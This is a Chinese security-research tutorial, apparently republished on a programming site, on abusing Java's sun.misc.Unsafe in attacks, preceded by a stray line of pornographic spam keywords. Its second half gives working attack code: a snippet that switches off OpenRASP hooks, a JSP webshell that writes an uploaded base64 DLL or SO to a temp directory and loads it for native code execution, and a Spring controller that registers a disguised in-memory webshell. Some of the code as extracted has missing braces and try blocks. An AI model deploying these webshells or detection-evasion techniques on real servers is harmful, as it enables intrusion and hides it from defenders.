欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Java中的Unsafe在安全領(lǐng)域的使用總結(jié)和復(fù)現(xiàn)(實(shí)例詳解)

 更新時(shí)間:2022年03月02日 08:29:59   作者:bitterz  
unsafe里面有很多好用的方法,比如allocateInstance可以直接創(chuàng)建實(shí)例對象,defineAnonymousClass可以創(chuàng)建一個(gè)VM匿名類(VM?Anonymous?Class),以及直接從內(nèi)存級別修改對象的值。這篇文章主要介紹了Java中的Unsafe在安全領(lǐng)域的一些應(yīng)用總結(jié)和復(fù)現(xiàn),需要的朋友可以參考下

總結(jié)并復(fù)現(xiàn)了一下Unsafe在安全領(lǐng)域的一些應(yīng)用

0 前言

unsafe里面有很多好用的方法,比如allocateInstance可以直接創(chuàng)建實(shí)例對象,defineAnonymousClass可以創(chuàng)建一個(gè)VM匿名類(VM Anonymous Class),以及直接從內(nèi)存級別修改對象的值。

1 基本使用

首先是獲取Unsafe對象,一般使用反射獲取Unsafe,否則會被Java安全機(jī)制攔截,代碼如下

public static Unsafe getUnsafe() throws Exception{
        Class<?> aClass = Class.forName("sun.misc.Unsafe");
        Constructor<?> declaredConstructor = aClass.getDeclaredConstructor();
        declaredConstructor.setAccessible(true);
        Unsafe unsafe= (Unsafe) declaredConstructor.newInstance();
        return unsafe;
    }

1.1 內(nèi)存級別修改值

這里首先要提到的是,在jvm中,對實(shí)例的Field進(jìn)行了有規(guī)律的存儲,具體可見JVM相關(guān)知識,而通過一個(gè)偏移量可以從內(nèi)存中找到相應(yīng)的Field值。在Unsafe中獲取偏移量的方法是staticFieldOffset(Field var1)和objectFieldOffset(Field var1)這兩個(gè)方法,輸入一個(gè)Field對象后,會返回該Field在其相應(yīng)的類中的內(nèi)存偏移量是多少。通過獲得的偏移量可進(jìn)一步調(diào)用putInt、putLong、putObject等方法對實(shí)例的field進(jìn)行修改。

例如:

package com.bitterz.unsafe;

import sun.misc.Unsafe;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
public class UnsafeTest {
    private int a = 1;
    private String string = "whoami";
    public UnsafeTest(){}
    public void test(){    }
    public static void main(String[] args) throws Exception {
        Unsafe unsafe = getUnsafe();
        UnsafeTest unsafeTest = new UnsafeTest();
        
        // 修改int
        Field f = Class.forName("com.bitterz.unsafe.UnsafeTest").getDeclaredField("a");
        long l = unsafe.objectFieldOffset(f);
        unsafe.putInt(unsafeTest, l, 9999);
        System.out.println(unsafeTest.a);
        // 修改string
        Field f2 = Class.forName("com.bitterz.unsafe.UnsafeTest").getDeclaredField("string");
        long l2 = unsafe.objectFieldOffset(f2);
        unsafe.putObject(unsafeTest, l2, "bitterz");
        System.out.println(unsafeTest.string);
    }
    public static Unsafe getUnsafe() throws Exception{
        Class<?> aClass = Class.forName("sun.misc.Unsafe");
        Constructor<?> declaredConstructor = aClass.getDeclaredConstructor();
        declaredConstructor.setAccessible(true);
        Unsafe unsafe= (Unsafe) declaredConstructor.newInstance();
        return unsafe;
}

其輸出結(jié)果為

但對final和static修飾的field這種修改方法無效。另外還可以通過偏移量使用getInt()、getObject()等方法獲取實(shí)例的field值,這種方法也可以作為反射被限制時(shí)的一種繞過。

1.2 創(chuàng)建對象

Unsafe中有個(gè)allocateInstance方法,可以無視構(gòu)造方法,直接利用類對象構(gòu)建實(shí)例,這種方法往往能夠減少反射創(chuàng)建實(shí)例時(shí)可能遇到的各種阻礙,比如類的依賴關(guān)系。

比如前面創(chuàng)建Unsafe時(shí)使用了反射,不能直接進(jìn)行創(chuàng)建,那么可以使用unsafe進(jìn)行創(chuàng)建(只是為了演示。。)

1.3 創(chuàng)建VM Anonymous Class

VM Anonymous Class并不等同于匿名類,這種類具有以下幾個(gè)特點(diǎn)(摘自https://paper.seebug.org/1785):

1、class名可以是已存在的class的名字,比如java.lang.File,即使如此也不會發(fā)生任何問題,java的動態(tài)編譯特性將會在內(nèi)存中生成名如 java.lang.File/13063602@38ed5306的class。  ---將會使類名極具欺騙性
2、該class的classloader為null。  ---在java中classloader為null的為來自BootstrapClassLoader的class,往往會被認(rèn)定為jdk自帶class
3、在JVM中存在大量動態(tài)編譯產(chǎn)生的class(多為lamada表達(dá)式生成),這種class均不會落盤,所以不落盤并不會屬于異常特征。 
4、無法通過Class.forName()獲取到該class的相關(guān)內(nèi)容。 ---嚴(yán)重影響通過反射排查該類安全性的檢測工具
5、在部分jdk版本中,VM Anonymous Class甚至無法進(jìn)行restransform。 ---這也就意味著我們無法通過attach API去修復(fù)這個(gè)惡意類
6、該class在transform中的className將會是它的模板類名。 ---這將會對那些通過attach方式檢測內(nèi)存馬的工具造成極大的誤導(dǎo)性

使用方法如下

defineAnonymousClass方法的第一個(gè)參數(shù)隨便傳入一個(gè)類對象即可,第二個(gè)參數(shù)需要傳入一個(gè)類的字節(jié)碼,這里使用javassist簡單一點(diǎn)。第三個(gè)參數(shù)設(shè)置為null即可。

執(zhí)行后得到一個(gè)類對象,通過newInstance獲取實(shí)例,再調(diào)用了匿名類的toString方法,彈個(gè)計(jì)算器。而后輸出匿名類的類名和Unsafe的類名進(jìn)行對比,可見,用defineAnonymousClass創(chuàng)建的類名后面,會有"/xxxxxxxx",這里也算一個(gè)特征,但通過Class.forName是無法獲取到這個(gè)類的,所以下面報(bào)錯(cuò)了。

用attach的方式,看看對該類的檢測,之前寫過rasp相關(guān)的筆記,所以直接拿過來用

transform里面拿到到該類后,直接報(bào)錯(cuò)了,看了一下報(bào)錯(cuò)日志,實(shí)際上就是在transform中返回字節(jié)碼時(shí)出問題了,因?yàn)榍懊嬉舱f了在部分jdk中,VM AnonymousClass是不能被retransform的,我這里用的是jdk1.8u40。但是直接結(jié)束程序有點(diǎn)不太好,例如插入內(nèi)存馬后,目標(biāo)使用attach機(jī)制來掃描jvm中加載的類,此時(shí)直接導(dǎo)致Web程序崩潰,業(yè)務(wù)不得提刀來殺安全:) 這個(gè)點(diǎn)用于內(nèi)存馬可能要慎重一下。

2 利用姿勢

2.1 修改值以關(guān)閉RASP等防御措施

前面提到了,通過Unsafe可以直接修改值,因此在遇到目標(biāo)有RASP得情況下,可以考慮修改RASP的開關(guān);

try {
    Class clazz = Class.forName("com.baidu.openrasp.HookHandler");
    Unsafe unsafe = getUnsafe();
    InputStream inputStream = clazz.getResourceAsStream(clazz.getSimpleName() + ".class");
    byte[] data = new byte[inputStream.available()];
    inputStream.read(data);
    Class anonymousClass = unsafe.defineAnonymousClass(clazz, data, null);
    Field field = anonymousClass.getDeclaredField("enableHook");
    unsafe.putObject(clazz, unsafe.staticFieldOffset(field), new AtomicBoolean(false));
    } catch (Exception e) {
    }

或者使用rebeyond師傅提到的方法,手動構(gòu)建insturmentation對象,然后對執(zhí)行命令的類去掉RASP插樁代碼。

2.2 創(chuàng)建NativeLibrary對象實(shí)現(xiàn)webshell

這里的思路來自于SummerSec師傅的文章,通過java.lang.ClassLoader$NativeLibrary#load(String, Boolean)方法,加載一個(gè)dll文件,而dll文件中可以實(shí)現(xiàn)各種攻擊手段,例如上傳了一個(gè)jsp文件,只用于加載dll,而不同的dll實(shí)現(xiàn)了內(nèi)網(wǎng)穿透、反彈Shell、木馬和執(zhí)行命令等功能,攻擊時(shí)上傳對應(yīng)dll文件即可。

借鑒https://github.com/SummerSec/Loader/blob/main/AddDllDemo.jsp ,又稍微改了一下代碼,把上傳文件和加載dll融合到了一個(gè)jsp里面

<%@page pageEncoding="utf-8"%>
<input type="file" id="fielinput" />
<img id="txshow" style="width:100px;height:100px;"/>
<br/>解析之后的base64數(shù)據(jù):<br/>
<p id="data"></p>

<head>
    <meta charset="utf-8">
</head>
<form action="http://127.0.0.1:8080/test/AddDllDemo.jsp" method="POST">
    <input type="text" style="width:1300px;height:100px;font-size:30px" name="p"/>
    <input type="submit" value="提交"/>
</form>
<script type="text/javascript">
var input = document.getElementById("fielinput");
input.addEventListener('change', readFile, false);
function readFile() {
   var file = this.files[0];
    var reader = new FileReader(); // 返回一個(gè)新的FileReader函數(shù)
    reader.readAsDataURL(file);
    reader.onload = function (e) {
        txshow.src = this.result;
        document.getElementById("data").innerText=this.result.substring(this.result.indexOf(',')+1);
    }
}
</script>>
<%
if(request.getMethod().equals("GET")){
    
}else{
    String p = request.getParameter("p");
    String t = request.getServletContext().getRealPath("/");
    java.io.PrintWriter outp = response.getWriter();
    outp.println("WebRootPath:");
    outp.println(t);
    t = request.getServletPath();
    outp.println("ServletPath:");
    t = (new java.io.File(".").getAbsolutePath());
    outp.println("WebServerPath:");
    java.util.Random random = new java.util.Random(System.currentTimeMillis());
    outp.println("if Dynamic Link Library will be auto load in uploading !!!");
    t = System.getProperty("os.name").toLowerCase();
    if (t.contains("windows")) {
        t = "C:/Windows/temp/dm" + random.nextInt(10000000) + "1.dll";
    }else {
        t = "/tmp/dm" + random.nextInt(10000000) + "1.so";
    if (p != null) {
        try {
            java.io.FileOutputStream fos = new java.io.FileOutputStream(new java.io.File(t));
            fos.write(D(p));
            fos.close();
            N(t);
            outp.println("Dynamic Link Library is uploaded, and the path is: " + t);
            outp.println("load uploaded success !!!");
        } catch (Exception e) {
            outp.println(e.getMessage());
        }
    outp.flush();
    outp.close();
%>
<%!
    private void N(String t) throws Exception {
        Object o;
        Class a = Class.forName("java.lang.ClassLoader$NativeLibrary");
            java.lang.reflect.Constructor c = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class});
            c.setAccessible(true);
            o = c.newInstance(Class.class,t,true);
        }catch (Exception e){
            Class u = Class.forName("sun.misc.Unsafe");
            java.lang.reflect.Constructor<?> c = u.getDeclaredConstructor();
            sun.misc.Unsafe un = (sun.misc.Unsafe)c.newInstance();
            o =  un.allocateInstance(a);
        java.lang.reflect.Method method = o.getClass().getDeclaredMethod("load", String.class, boolean.class);
        method.setAccessible(true);
        method.invoke(o, t, false);
    private byte[] D(String p) throws Exception {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[])(clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), p));
        } catch (Exception var5) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[])(decoder.getClass().getMethod("decode", String.class).invoke(decoder, p));

瀏覽器訪問AddDllDemo.jsp后,選擇dll文件,并復(fù)制base64值到文本框中,點(diǎn)擊提交

成功彈出計(jì)算器

使用Unsafe去創(chuàng)建NativeLibrary的有點(diǎn)在于可以減少在java層面的調(diào)用,直接一個(gè)load方法就能實(shí)現(xiàn)native層面的代碼執(zhí)行,可以繞過RASP或終端軟件對webshell的查殺,以及java層面執(zhí)行命令時(shí)被攔截的可能。

目前這種做法有個(gè)缺點(diǎn)在于DLL文件必須落地,顯然落地就有可能被文件監(jiān)控察覺到。另外實(shí)現(xiàn)這種做法的還有ClassLoader#loadLibraryClassLoader#loadLibrary0,利用反射即可實(shí)現(xiàn)不再贅述。期待大師傅們搞出無文件落地的姿勢!

2.3 匿名的內(nèi)存馬

前面提到了使用Unsafe.defineAnonymousClass方法可以創(chuàng)建一個(gè)VM Anonymous Class,基于其各種特點(diǎn),可以讓內(nèi)存馬隱藏的更深

在springmvc中,插入servlet內(nèi)存馬時(shí),只需要傳入方法名和惡意類的實(shí)例對象,剛好適合這種Anonymous Class,pom.xml設(shè)置如下

<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-web</artifactId>
    <version>4.2.6.RELEASE</version>
</dependency>
<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-webmvc</artifactId>
    <version>4.2.6.RELEASE</version>
</dependency>
<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-context</artifactId>
    <version>4.2.6.RELEASE</version>
</dependency>
<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-test</artifactId>
    <version>4.2.6.RELEASE</version>
</dependency>
<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-jdbc</artifactId>
    <version>4.2.6.RELEASE</version>
</dependency>
<dependency>
    <groupId>org.javassist</groupId>
    <artifactId>javassist</artifactId>
    <version>3.19.0-GA</version>
</dependency>

在spring_mvc中寫個(gè)controller來注入,示例代碼如下:

@ResponseBody
@RequestMapping(value = "/index", method = RequestMethod.GET)
public String index(HttpServletRequest request, HttpServletResponse response) throws Exception {
    // 準(zhǔn)備unsafe和匿名類
    Class<?> aClass = Class.forName("sun.misc.Unsafe");
    Constructor<?> declaredConstructor = aClass.getDeclaredConstructor();
    declaredConstructor.setAccessible(true);
    Unsafe unsafe= (Unsafe) declaredConstructor.newInstance();
    ClassPool classPool = ClassPool.getDefault();
    CtClass ctClass = classPool.makeClass("java.lang.String");
    CtMethod toString = CtMethod.make("public String toString(){java.lang.Runtime.getRuntime().exec(\"calc\");return null;}", ctClass);
    toString.setName("toString");
    ctClass.addMethod(toString);
    byte[] bytes = ctClass.toBytecode();
    Class<?> anonymousClass = unsafe.defineAnonymousClass(File.class, bytes, null);

    // 插入內(nèi)存馬
    WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
    // 1. 從當(dāng)前上下文環(huán)境中獲得 RequestMappingHandlerMapping 的實(shí)例 bean
    RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
    AbstractHandlerMethodMapping abstractHandlerMethodMapping = context.getBean(AbstractHandlerMethodMapping.class);
    Method method = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping").getDeclaredMethod("getMappingRegistry");
    method.setAccessible(true);
    Object  mappingRegistry = (Object) method.invoke(abstractHandlerMethodMapping);
    Field field = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry").getDeclaredField("urlLookup");
    field.setAccessible(true);
    Map urlLookup = (Map) field.get(mappingRegistry);
    Iterator urlIterator = urlLookup.keySet().iterator();
    String injectUrlPath = "/malicious"; // 插入的url
    while (urlIterator.hasNext()){
        String urlPath = (String) urlIterator.next();
        if (injectUrlPath.equals(urlPath)){
            System.out.println("URL已存在");
            return "exist";
        }
    }

    // 2. 通過反射獲得自定義 controller 中唯一的 Method 對象
    Method method2 = anonymousClass.getDeclaredMethod("toString");

    // 3. 定義訪問 controller 的 URL 地址
    PatternsRequestCondition url = new PatternsRequestCondition(injectUrlPath);
    // 4. 定義允許訪問 controller 的 HTTP 方法(GET/POST)
    RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
    // 5. 在內(nèi)存中動態(tài)注冊 controller
    RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
    //        InjectAnonymousClass InjectAnonymousClass = new InjectAnonymousClass("aaa");
    Object o = anonymousClass.newInstance();
    mappingHandlerMapping.registerMapping(info, o, method2);

    return "injected!";  // 這里根據(jù)注解會自動返回index.html
}

啟動項(xiàng)目,然后訪問該controller對應(yīng)的url,結(jié)果如下

注入成功,訪問/malicious

由于惡意代碼里面只寫了彈計(jì)算器,并沒有寫返回語句,所以tomcat尋找malicious.jsp會返回404。調(diào)試模式下看一下對該url的描述

只有在beanType處顯示類名為java.lang.String/179284069,其它地方都顯示為java.lang.String。匿名類的類名又可以隨意設(shè)置,所以稍加修飾即可以假亂真,比如先拿到org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry,遍歷其中,隨便找一個(gè)controller的類名和方法名,然后回顯一下,再給惡意類寫個(gè)一樣的package和方法名,url則根據(jù)Web應(yīng)用的規(guī)律自己編一個(gè),這樣的話,還是能夠欺騙到根據(jù)package和方法名判斷的檢測方法,另外VM Anonymous Class沒辦法獲取到字節(jié)碼,所以也能逃過一劫。

2.4 shellcode和instrumentation對象構(gòu)建

Unsafe類還能對內(nèi)存進(jìn)行操作,在rebeyond師傅的文章-java內(nèi)存攻擊技術(shù)漫談中有大量應(yīng)用,最終可以通過內(nèi)存級別的操作,直接構(gòu)建instrumentation對象進(jìn)而修改jvm中的java代碼;或者執(zhí)行shellcode,從而繞過RASP實(shí)現(xiàn)命令執(zhí)行、文件讀寫等操作。

3 總結(jié)

Unsafe在java攻擊層面屬實(shí)非常有用,而其正常使用也非常廣泛,例如gson反序列化時(shí),直接使用allocateInstance創(chuàng)建對象,無視構(gòu)造函數(shù)的復(fù)雜。Unsafe還有很多其它功能,不夠安全人員可能用的比較少,我也借用一下這張傳的最廣泛的圖:)

參考:

https://paper.seebug.org/1785

https://tttang.com/archive/1436/

https://www.cnblogs.com/rebeyond/p/15162264.html

到此這篇關(guān)于Java中的Unsafe在安全領(lǐng)域的一些應(yīng)用總結(jié)和復(fù)現(xiàn)的文章就介紹到這了,更多相關(guān)Java中的Unsafe內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • Java page cache回寫機(jī)制案例詳解

    Java page cache回寫機(jī)制案例詳解

    這篇文章主要介紹了Java page cache回寫機(jī)制案例詳解,本篇文章通過簡要的案例,講解了該項(xiàng)技術(shù)的了解與使用,以下就是詳細(xì)內(nèi)容,需要的朋友可以參考下
    2021-09-09
  • 為什么不推薦使用BeanUtils屬性轉(zhuǎn)換工具示例詳解

    為什么不推薦使用BeanUtils屬性轉(zhuǎn)換工具示例詳解

    這篇文章主要介紹了為什么不推薦使用BeanUtils屬性轉(zhuǎn)換工具,本文通過示例代碼給大家詳細(xì)介紹,對大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2020-07-07
  • 詳解JDK9特性之JPMS模塊化

    詳解JDK9特性之JPMS模塊化

    JDK9引入了一個(gè)特性叫做JPMS(Java Platform Module System),也可以叫做Project Jigsaw。模塊化的本質(zhì)就是將一個(gè)大型的項(xiàng)目拆分成為一個(gè)一個(gè)的模塊,每個(gè)模塊都是獨(dú)立的單元,并且不同的模塊之間可以互相引用和調(diào)用。本文將詳細(xì)介紹JDK9特性之JPMS模塊化。
    2021-06-06
  • SpringBoot整合Redis哨兵模式的實(shí)現(xiàn)示例

    SpringBoot整合Redis哨兵模式的實(shí)現(xiàn)示例

    Redis哨兵模式是Redis高可用方案的一種實(shí)現(xiàn)方式,通過哨兵來自動實(shí)現(xiàn)故障轉(zhuǎn)移,從而保證高可用,本文主要介紹了SpringBoot整合Redis哨兵模式的實(shí)現(xiàn)示例,具有一定的參考價(jià)值,感興趣的可以了解一下
    2024-02-02
  • Java中使用BeanMap將對象轉(zhuǎn)為Map詳解

    Java中使用BeanMap將對象轉(zhuǎn)為Map詳解

    這篇文章主要介紹了Java中使用BeanMap將對象轉(zhuǎn)為Map詳解,BeanMap?是?Apache?Commons?BeanUtils?庫中的一個(gè)類,BeanMap?可以將?Java?對象的屬性作為鍵,屬性值作為對應(yīng)的值,存儲在一個(gè)?Map?中,它提供了一種將?Java?對象轉(zhuǎn)換為?Map?的方式,需要的朋友可以參考下
    2024-01-01
  • 工廠方法模式_動力節(jié)點(diǎn)Java學(xué)院整理

    工廠方法模式_動力節(jié)點(diǎn)Java學(xué)院整理

    這篇文章主要介紹了工廠方法模式_動力節(jié)點(diǎn)Java學(xué)院整理的相關(guān)資料,需要的朋友可以參考下
    2017-08-08
  • Java中使用Jedis操作Redis的示例代碼

    Java中使用Jedis操作Redis的示例代碼

    本篇文章主要介紹了Java中使用Jedis操作Redis的示例代碼,具有一定的參考價(jià)值,有興趣的可以了解一下。
    2016-12-12
  • Java實(shí)現(xiàn)五子棋(附詳細(xì)源碼)

    Java實(shí)現(xiàn)五子棋(附詳細(xì)源碼)

    這篇文章主要為大家詳細(xì)介紹了Java實(shí)現(xiàn)五子棋游戲,文中示例代碼介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下
    2020-03-03
  • kafka安裝部署超詳細(xì)步驟

    kafka安裝部署超詳細(xì)步驟

    這篇文章主要介紹了kafka安裝部署的詳細(xì)步驟,主要應(yīng)用場景是:日志收集系統(tǒng)和消息系統(tǒng),本文給大家介紹的非常詳細(xì),對大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2021-11-11
  • Java Random.nextInt()方法原理解析

    Java Random.nextInt()方法原理解析

    這篇文章主要介紹了Java Random.nextInt()方法原理解析,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友可以參考下
    2020-09-09

最新評論